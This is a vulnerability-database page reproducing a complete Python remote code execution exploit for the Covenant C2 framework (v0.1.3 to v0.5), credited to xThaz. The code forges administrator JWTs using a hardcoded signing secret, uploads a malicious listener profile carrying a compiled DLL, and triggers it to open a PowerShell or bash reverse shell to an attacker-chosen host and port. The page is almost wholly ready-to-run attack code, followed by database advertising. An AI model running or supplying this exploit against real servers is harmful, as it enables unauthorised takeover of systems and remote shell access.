Lucene search
K

Covenant 0.5 Remote Code Execution

🗓️ 30 Mar 2023 00:00:00Reported by xThazType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 418 Views

Covenant v0.5 Remote Code Executio

Code
`# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)  
# Exploit Author: xThaz  
# Author website: https://xthaz.fr/  
# Date: 2022-09-11  
# Vendor Homepage: https://cobbr.io/Covenant.html  
# Software Link: https://github.com/cobbr/Covenant  
# Version: v0.1.3 - v0.5  
# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker  
  
# Vulnerability  
## Discoverer: coastal  
## Date: 2020-07-13  
## Discoverer website: https://blog.null.farm  
## References:  
## - https://blog.null.farm/hunting-the-hunters  
## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb  
  
# !/usr/bin/env python3  
# encoding: utf-8  
  
  
import jwt # pip3 install PyJWT  
import json  
import warnings  
import base64  
import re  
import random  
import argparse  
  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome  
from Crypto.Util.Padding import pad  
from Crypto.Cipher import AES  
from requests import request # pip3 install requests  
from subprocess import run  
from pwn import remote, context # pip3 install pwntools  
from os import remove, urandom  
from shutil import which  
from urllib.parse import urlparse  
from pathlib import Path  
from time import time  
  
  
def check_requirements():  
if which("mcs") is None:  
print("Please install the mono framework in order to compile the payload.")  
print("https://www.mono-project.com/download/stable/")  
exit(-1)  
  
  
def random_hex(length):  
alphabet = "0123456789abcdef"  
return ''.join(random.choice(alphabet) for _ in range(length))  
  
  
def request_api(method, token, route, body=""):  
warnings.simplefilter('ignore', InsecureRequestWarning)  
  
return request(  
method,  
f"{args.target}/api/{route}",  
json=body,  
headers={  
"Authorization": f"Bearer {token}",  
"Content-Type": "application/json"  
},  
verify=False  
)  
  
  
def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):  
secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'  
  
payload_data = {  
"sub": username,  
"jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",  
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,  
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [  
"User",  
"Administrator"  
],  
"exp": int(time()) + 360,  
"iss": "Covenant",  
"aud": "Covenant"  
}  
  
token = jwt.encode(payload_data, secret_key, algorithm='HS256')  
return token  
  
  
def get_id_admin(token, json_roles):  
id_admin = ""  
for role in json_roles:  
if role["name"] == "Administrator":  
id_admin = role["id"]  
print(f"\t[*] Found the admin group id : {id_admin}")  
break  
else:  
print("\t[!] Did not found admin group id, quitting !")  
exit(-1)  
  
id_admin_user = ""  
json_users_roles = request_api("get", token, f"users/roles").json()  
for user_role in json_users_roles:  
if user_role["roleId"] == id_admin:  
id_admin_user = user_role["userId"]  
print(f"\t[*] Found the admin user id : {id_admin_user}")  
break  
else:   
print("\t[!] Did not found admin id, quitting !")  
exit(-1)  
  
json_users = request_api("get", token, f"users").json()  
for user in json_users:  
if user["id"] == id_admin_user:  
username_admin = user["userName"]  
print(f"\t[*] Found the admin username : {username_admin}")  
return username_admin, id_admin_user  
else:   
print("\t[!] Did not found admin username, quitting !")  
exit(-1)  
  
  
def compile_payload():  
if args.os == "windows":  
payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'  
else:  
payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'  
  
dll = """using System;  
using System.Reflection;  
  
namespace ExampleDLL{  
public class Class1{  
public Class1(){  
}  
  
public void Main(string[] args){  
System.Diagnostics.Process.Start(""" + payload + """);  
}  
}  
}  
"""  
  
temp_dll_path = f"/tmp/{random_hex(8)}"  
Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())  
print(f"\t[*] Writing payload in {temp_dll_path}.cs")  
  
compilo_path = which("mcs")  
compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])  
if compilation.returncode:  
print("\t[!] Error when compiling DLL, quitting !")  
exit(-1)  
print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")  
  
dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()  
  
remove(temp_dll_path + ".cs")  
remove(temp_dll_path + ".dll")  
print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")  
return dll_encoded  
  
  
def generate_wrapper(dll_encoded):  
wrapper = """public static class MessageTransform {  
public static string Transform(byte[] bytes) {  
try {  
string assemblyBase64 = \"""" + dll_encoded + """\";  
var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);  
var assembly = System.Reflection.Assembly.Load(assemblyBytes);  
foreach (var type in assembly.GetTypes()) {  
object instance = System.Activator.CreateInstance(type);  
object[] args = new object[] { new string[] { \"\" } };  
try {  
type.GetMethod(\"Main\").Invoke(instance, args);  
}  
catch {}  
}  
}  
catch {}  
return System.Convert.ToBase64String(bytes);  
}  
  
public static byte[] Invert(string str) {  
return System.Convert.FromBase64String(str);  
}  
}"""  
  
return wrapper  
  
  
def upload_profile(token, wrapper):  
body = {  
'httpUrls': [  
'/en-us/index.html',  
'/en-us/docs.html',  
'/en-us/test.html'  
],  
'httpRequestHeaders': [  
{'name': 'User-Agent',  
'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '  
'Safari/537.36'},  
{'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}  
],  
'httpResponseHeaders': [  
{'name': 'Server', 'value': 'Microsoft-IIS/7.5'}  
],  
'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',  
'httpGetResponse': '{DATA}',  
'httpPostResponse': '{DATA}',  
'id': 0,  
'name': random_hex(8),  
'description': '',  
'type': 'HTTP',  
'messageTransform': wrapper  
}  
  
response = request_api("post", token, "profiles/http", body)  
  
if not response.ok:  
print("\t[!] Failed to create the listener profile, quitting !")  
exit(-1)  
else:  
profile_id = response.json().get('id')  
print(f"\t[*] Profile created with id {profile_id}")  
print("\t[*] Successfully created the listener profile")  
return profile_id  
  
  
def generate_valid_listener_port(impersonate_token, tries=0):  
if tries >= 10:  
print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")  
exit(-1)  
  
port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT  
listeners = request_api("get", impersonate_token, "listeners").json()  
  
port_used = []  
for listener in listeners:  
port_used.append(listener["bindPort"])  
  
if port in port_used:  
print(f"\t[!] Port {port} is already taken by another listener, retrying !")  
generate_valid_listener_port(impersonate_token, tries + 1)  
else:  
print(f"\t[*] Port {port} seems free")  
return port  
  
  
def get_id_listener_type(impersonate_token, listener_name):  
response = request_api("get", impersonate_token, "listeners/types")  
if not response.ok:  
print("\t[!] Failed to get the listener type, quitting !")  
exit(-1)  
else:  
for listener_type in response.json():  
if listener_type["name"] == listener_name:  
print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')  
return listener_type["id"]  
  
  
def generate_listener(impersonate_token, profile_id):  
listener_port = generate_valid_listener_port(impersonate_token)  
listener_name = random_hex(8)  
data = {  
'useSSL': False,  
'urls': [  
f"http://0.0.0.0:{listener_port}"  
],  
'id': 0,  
'name': listener_name,  
'bindAddress': "0.0.0.0",  
'bindPort': listener_port,  
'connectAddresses': [  
"0.0.0.0"  
],  
'connectPort': listener_port,  
'profileId': profile_id,  
'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),  
'status': 'Active'  
}  
  
response = request_api("post", impersonate_token, "listeners/http", data)  
  
if not response.ok:  
print("\t[!] Failed to create the listener, quitting !")  
exit(-1)  
else:  
print("\t[*] Successfully created the listener")  
listener_id = response.json().get("id")  
return listener_id, listener_port  
  
  
def create_grunt(impersonate_token, data):  
stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]  
if stager_code == "":  
stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]  
if stager_code == "":  
print("\t[!] Failed to create the grunt payload, quitting !")  
exit(-1)  
  
print("\t[*] Successfully created the grunt payload")  
return stager_code  
  
  
def get_grunt_config(impersonate_token, listener_id):  
data = {  
'id': 0,  
'listenerId': listener_id,  
'implantTemplateId': 1,  
'name': 'Binary',  
'description': 'Uses a generated .NET Framework binary to launch a Grunt.',  
'type': 'binary',  
'dotNetVersion': 'Net35',  
'runtimeIdentifier': 'win_x64',  
'validateCert': True,  
'useCertPinning': True,  
'smbPipeName': 'string',  
'delay': 0,  
'jitterPercent': 0,  
'connectAttempts': 0,  
'launcherString': 'GruntHTTP.exe',  
'outputKind': 'consoleApplication',  
'compressStager': False  
}  
  
stager_code = create_grunt(impersonate_token, data)  
aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code)  
guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)  
if not aes_key or not guid_prefix:  
print("\t[!] Failed to retrieve the grunt configuration, quitting !")  
exit(-1)  
  
aes_key = aes_key.group(1)  
guid_prefix = guid_prefix.group(1)  
print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")  
return aes_key, guid_prefix  
  
  
def aes256_cbc_encrypt(key, message):  
iv_bytes = urandom(16)  
key_decoded = base64.b64decode(key)  
encoded_message = pad(message.encode(), 16)  
  
cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)  
encrypted = cipher.encrypt(encoded_message)  
  
hmac = HMAC.new(key_decoded, digestmod=SHA256)  
signature = hmac.update(encrypted).digest()  
  
return encrypted, iv_bytes, signature  
  
  
def trigger_exploit(listener_port, aes_key, guid):  
message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"  
  
ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)  
data = {  
"GUID": guid,  
"Type": 0,  
"Meta": '',  
"IV": base64.b64encode(iv).decode(),  
"EncryptedMessage": base64.b64encode(ciphered).decode(),  
"HMAC": base64.b64encode(signature).decode()  
}  
  
json_data = json.dumps(data).encode("utf-8")  
payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"  
  
if send_exploit(listener_port, "Cookie", guid, payload):  
print("\t[*] Exploit succeeded, check listener")  
else :  
print("\t[!] Exploit failed, retrying")  
if send_exploit(listener_port, "Cookies", guid, payload):  
print("\t[*] Exploit succeeded, check listener")  
else:  
print("\t[!] Exploit failed, quitting")  
  
  
def send_exploit(listener_port, header_cookie, guid, payload):  
context.log_level = 'error'  
  
request = f"""POST /en-us/test.html HTTP/1.1\r  
Host: {IP_TARGET}:{listener_port}\r  
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r  
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\r  
Content-Type: application/x-www-form-urlencoded\r  
Content-Length: {len(payload)}\r  
\r  
{payload}  
""".encode()  
  
sock = remote(IP_TARGET, listener_port)  
sock.sendline(request)  
response = sock.recv().decode()  
sock.close()  
  
if "HTTP/1.1 200 OK" in response:  
return True  
else:  
return False  
  
if __name__ == "__main__":  
check_requirements()  
  
parser = argparse.ArgumentParser()  
parser.add_argument("target",  
help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")  
parser.add_argument("os",  
help="Operating System of the target",  
choices=["windows", "linux"])  
parser.add_argument("lhost",  
help="IP of the machine that will receive the reverse shell")  
parser.add_argument("lport",  
help="Port of the machine that will receive the reverse shell")  
args = parser.parse_args()  
  
IP_TARGET = urlparse(args.target).hostname  
  
print("[*] Getting the admin info")  
sacrificial_token = craft_jwt("xThaz")  
roles = request_api("get", sacrificial_token, "roles").json()  
admin_username, admin_id = get_id_admin(sacrificial_token, roles)  
impersonate_token = craft_jwt(admin_username, admin_id)  
print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")  
  
print("[*] Generating payload")  
dll_encoded = compile_payload()  
wrapper = generate_wrapper(dll_encoded)  
print("[*] Uploading malicious listener profile")  
profile_id = upload_profile(impersonate_token, wrapper)  
  
print("[*] Generating listener")  
listener_id, listener_port = generate_listener(impersonate_token, profile_id)  
  
print("[*] Triggering the exploit")  
aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)  
trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation